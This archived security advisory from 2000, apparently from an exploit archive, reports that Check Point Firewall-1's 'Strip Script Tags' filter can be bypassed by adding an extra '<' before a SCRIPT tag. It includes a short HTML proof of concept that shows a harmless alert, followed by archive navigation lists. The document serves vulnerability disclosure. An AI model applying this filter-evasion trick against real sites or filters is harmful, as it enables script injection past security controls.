fw1_script.tags.txt

fw1_script.tags.txt: Posted Feb 1, 2000; Authored by Arne Vidstrom | Site ntsecurity.nu; The "Strip Script Tags" feature in Firewall-1 can be circumvented by adding an extra less than sign before the SCRIPT tag. The code will still execute in both Navigator and Explorer.; tags | exploit; SHA-256 | 63dba9e4776e49be0b9d685899d424e7c95359cd0499b13e8116377966747f78; Download | Favorite | View

fw1_script.tags.txt

Hi all,

The "Strip Script Tags" in FW-1 can be circumvented by adding an extra <
before the <SCRIPT> tag like in this code:

<HTML>
<HEAD>
<<SCRIPT LANGUAGE="JavaScript">
alert("hello world")
</SCRIPT>
</HEAD>
<BODY>
test
</BODY>
</HTML>

This code will pass unchanged, and still execute in both Navigator and
Explorer. I tried this on version 3.0 of FW-1 (on Windows NT 4.0) but I'm
not able to check it on version 4.0 since I don't have access to it.


/Arne Vidstrom

http://ntsecurity.nu

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

fw1_script.tags.txt

fw1_script.tags.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

fw1_script.tags.txt

Share This

fw1_script.tags.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems